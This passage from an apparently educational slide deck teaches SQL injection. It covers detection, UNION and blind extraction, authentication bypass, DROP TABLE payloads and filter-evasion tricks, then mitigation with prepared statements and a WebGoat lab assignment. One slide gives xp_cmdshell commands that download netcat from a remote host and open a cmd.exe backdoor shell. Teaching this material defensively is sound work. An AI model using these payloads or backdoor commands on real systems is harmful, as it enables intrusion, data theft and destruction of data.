  • 7. SQL Injection Attack #2 Database Modification Attack: password = foo’; delete fromtable use rs where use rnam e like ‘% DB executes two SQL statements: select count(* ) fromuse rs where use rnam e = ‘use r’ and passwo rd = ‘fo o ’ delete fromtable use rs where use rnam e like ‘%’
  • 9. Finding SQL Injection Bugs 1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 1. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable. 1. Try string or numeric operators.  Oracle: ’||’FOO  MS-SQL: ‘+’FOO  MySQL: ’ ’FOO  2-2  81+19  49-ASCII(1)
  • 10. Injecting into SELECT Most common SQL entry point. SELECT columns FROM table WHERE expression ORDER BY expression Places where user input is inserted: WHERE expression ORDER BY expression Table or column names
  • 11. Injecting into INSERT Creates a new data row in a table. INSERT INTO table (col1, col2, ...) VALUES (val1, val2, ...) Requirements Number of values must match # columns. Types of values must match column types. Technique: add values until no error. foo’)-- foo’, 1)-- foo’, 1, 1)--
  • 12. Injecting into UPDATE Modifies one or more rows of data. UPDATE table SET col1=val1, col2=val2, ... WHERE expression Places where input is inserted SET clause WHERE clause Be careful with WHERE clause ’ OR 1=1 will change all rows
  • 13. UNION Combines SELECTs into one result. SELECT cols FROM table WHERE expr UNION SELECT cols2 FROM table2 WHERE expr2 Allows attacker to read any table foo’ UNION SELECT number FROM cc-- Requirements Results must have same number and type of cols. Attacker needs to know name of other table. DB returns results with column names of 1st query.
  • 14. UNION Finding #columns with NULL ‘ UNION SELECT NULL-- ‘ UNION SELECT NULL, NULL-- ‘ UNION SELECT NULL, NULL, NULL-- Finding #columns with ORDER BY ‘ ORDER BY 1-- ‘ ORDER BY 2-- ‘ ORDER BY 3-- Finding a string column to extract data ‘ UNION SELECT ‘a’, NULL, NULL— ‘ UNION SELECT NULL, ‘a’, NULL-- ‘ UNION SELECT NULL, NULL, ‘a’--
  • 15. Inference Attacks Problem: What if app doesn’t print data? Injection can produce detectable behavior Successful or failed web page. Noticeable time delay or absence of delay. Identify an exploitable URL http://site/blog?message=5 AND 1=1 http://site/blog?message=5 AND 1=2 Use condition to identify one piece of data (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1 (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2 ... or use binary search technique ... (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5
  • 16. More Examples (1)  Application authentication bypass using SQL injection.  Suppose a web form takes userID and password as input.  The application receives a user ID and a password and authenticate the user by checking the existence of the user in the USER table and matching the data in the PWD column.  Assume that the application is not validating what the user types into these two fields and the SQL statement is created by string concatenation.
  • 17. More Example (2)  The following code could be an example of such bad practice: sqlString = “select USERID from USER where USERID = `” & userId & “` and PWD = `” & pwd & “`” result = GetQueryResult(sqlString) If(result = “”) then userHasBeenAuthenticated = False Else userHasBeenAuthenticated = True End If
  • 18. More Example (3)  User ID: ` OR ``=`  Password: `OR ``=`  In this case the sqlString used to create the result set would be as follows: select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` TRUE TRUE  Which would certainly set the userHasBenAuthenticated variable to true.
  • 19. More Example (4) User ID: ` OR ``=`` -- Password: abc Because anything after the -- will be ignore, the injection will work even without any specific injection into the password predicate.
  • 20. More Example (5) User ID: ` ; DROP TABLE USER ; -- Password: `OR ``=` select USERID from USER where USERID = `` ; DROP TABLE USER ; -- ` and PWD = ``OR ``=`` I will not try to get any information, I just wan to bring the application down.
  • 21. Beyond Data Retrieval Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users. With the UTL_TCP package and its procedures and functions, PL/SQL applications can communicate with external TCP/IP-based servers using TCP/IP. Because many Internet application protocols are based on TCP/IP, this package is useful to PL/SQL applications that use Internet protocols and e-mail.
  • 22. Beyond Data Retrieval Downloading Files exec master..xp_cmdshell ‘tftp 192.168.1.1 GET nc.exe c:nc.exe’ Backdoor with Netcat exec master..xp_cmdshell ‘nc.exe -e cmd.exe -l -p 53’ Direct Backdoor w/o External Cmds UTL_TCP.OPEN_CONNECTION('192.168.0.1', 2222, 1521) //charset: 1521 //port: 2222 //host: 192.168.0.1
  • 23. Impact of SQL Injection 1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.
  • 24. The Cause: String Building Building a SQL command string with user input in any language is dangerous. • Variable interpolation. • String concatenation with variables. • String format functions like sprintf(). • String templating with variable replacement.
  • 25. Mitigating SQL Injection Ineffective Mitigations Blacklists Stored Procedures Partially Effective Mitigations Whitelists Prepared Queries
  • 26. Blacklists Filter out or Sanitize known bad SQL meta- characters, such as single quotes. Problems: 1. Numeric parameters don’t use quotes. 2. URL escaped metacharacters. 3. Unicode encoded metacharacters. 4. Did you miss any metacharacters? Though it's easy to point out some dangerous characters, it's harder to point to all of them.
  • 27. Bypassing Filters Different case SeLecT instead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building ‘us’||’er’ chr(117)||chr(115)||chr(101)||chr(114)
  • 28. Stored Procedures Stored Procedures build strings too: CREATE PROCEDURE dbo.doQuery(@id nchar(128)) AS DECLARE @query nchar(256) SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’ EXEC @query RETURN it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection. It's only proper binding with prepare/execute or direct SQL statements with bound variables that provide protection.
  • 29. Whitelist Reject input that doesn’t match your list of safe characters to accept.  Identify what is good, not what is bad.  Reject input instead of attempting to repair.  Still have to deal with single quotes when required, such as in names.
  • 30. Prepared Queries  bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. Later, this prepared query is "executed" with a list of parameters.Example in Perl: $sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;"); $sth->execute($email); $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.
  • 31. Prepared Queries  bound parameters in Java Insecure version Statement s = connection.createStatement(); ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = " + formField); // *boom* Secure version PreparedStatement ps = connection.prepareStatement( "SELECT email FROM member WHERE name = ?"); ps.setString(1, formField); ResultSet rs = ps.executeQuery(); There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.
  • 32. References:http://devzone.zend.com/article/686 http://unixwiz.net/techtips/sql-injection.html ?php $mysqli = new mysqli('localhost', 'user', 'password', 'world'); /* check connection */ if (mysqli_connect_errno()) { printf(Connect failed: %sn, mysqli_connect_error()); exit(); } $stmt = $mysqli-prepare(INSERT INTO CountryLanguage VALUES (?, ?, ?, ?)); $stmt-bind_param('sssd', $code, $language, $official, $percent); // ‘sssd’ specifies format $code = 'DEU'; $language = 'Bavarian'; $official = F; $percent = 11.2; /* execute prepared statement */ $stmt-execute(); printf(%d Row inserted.n, $stmt-affected_rows); /* close statement and connection */ $stmt-close(); /* Clean up table CountryLanguage */ $mysqli-query(DELETE FROM CountryLanguage WHERE Language='Bavarian'); printf(%d Row deleted.n, $mysqli-affected_rows); /* close connection */ $mysqli-close(); ? Prepared Queries
  • 33. Other Injection Types  Shell injection.  Scripting language injection.  File inclusion.  XML injection.  XPath injection.  LDAP injection.  SMTP injection.
  • 34. SQL injection Conclusion  SQL injection is technique for exploiting applications that use relational databases as their back end.  Applications compose SQL statements and send to database.  SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
  • 35. SQL injection Conclusion  The technique is based on malformed user- supplied data  Transform the innocent SQL calls to a malicious call  Cause unauthorized access, deletion of data, or theft of information  All databases can be a target of SQL injection and all are vulnerable to this technique.  The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
  • 36. Project 7: Due on April 25  Visit the website for information about webGoat: http://www.irongeek.com/i.php?page=videos/webgoat-sql-injection  Read WebGoad User and Install Guide http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project  Install WebGoat and play with SQL injection.
  • 37. References 1. Andres Andreu, Pro fe ssio nalPe n Te sting fo r We b Applicatio ns , Wrox, 2006. 2. Chris Anley, “Advanced SQL Injection In SQL Server Applications,” http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002. 3. Stephen J. Friedl, “SQL Injection Attacks by Example,” http://www.unixwiz.net/techtips/sql- injection.html, 2005. 4. Ferruh Mavituna, SQL Injection Cheat Sheet, http://ferruh.mavituna.com/sql-injection- cheatsheet-oku 5. J.D. Meier, et. al., Im pro ving We b Applicatio n Se curity: Thre ats and Co unte rm e asure s , Microsoft, http://msdn2.microsoft.com/en-us/library/aa302418.aspx, 2006. 6. Randall Munroe, XKCD, http://xkcd.com/327/ 7. OWASP, OWASP Testing Guide v2, http://www.owasp.org/index.php/Testing_for_SQL_Injection, 2007. 8. Joel Scambray, Mike Shema, and Caleb Sima, Hacking Expo se d: We b Applicatio ns, 2nd e ditio n, Addison-Wesley, 2006. 9. SEMS, “SQL Injection used to hack Real Estate Web Sites,” http://www.semspot.com/2007/12/19/sql-injection-used-to-hack-real-estate-websites- extreme-blackhat/, 2007. 10. Chris Shiflett, Esse ntialPHP Se curity, O’Reilly, 2005. 11. SK, “SQL Injection Walkthrough,” http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002. 12. SPI Labs, “Blind SQL Injection,” http://sqlinjection.com/assets/documents/Blind_SQLInjection.pdf, 2007. 13. Dafydd Stuttard and Marcus Pinto, We b Applicatio n Hacke r’s Handbo o k, Wiley, 2007. 14. WASC, “Web Application Incidents Annual Report 2007,” https://bsn.breach.com/downloads/whid/The%20Web%20Hacking%20Incidents %20Database%20Annual%20Report%202007.pdf, 2008.

Hinweis der Redaktion

  1. Principle of Least Privilege likely violated as web server user needs privileges to do all operators permitted on users, including deleting them.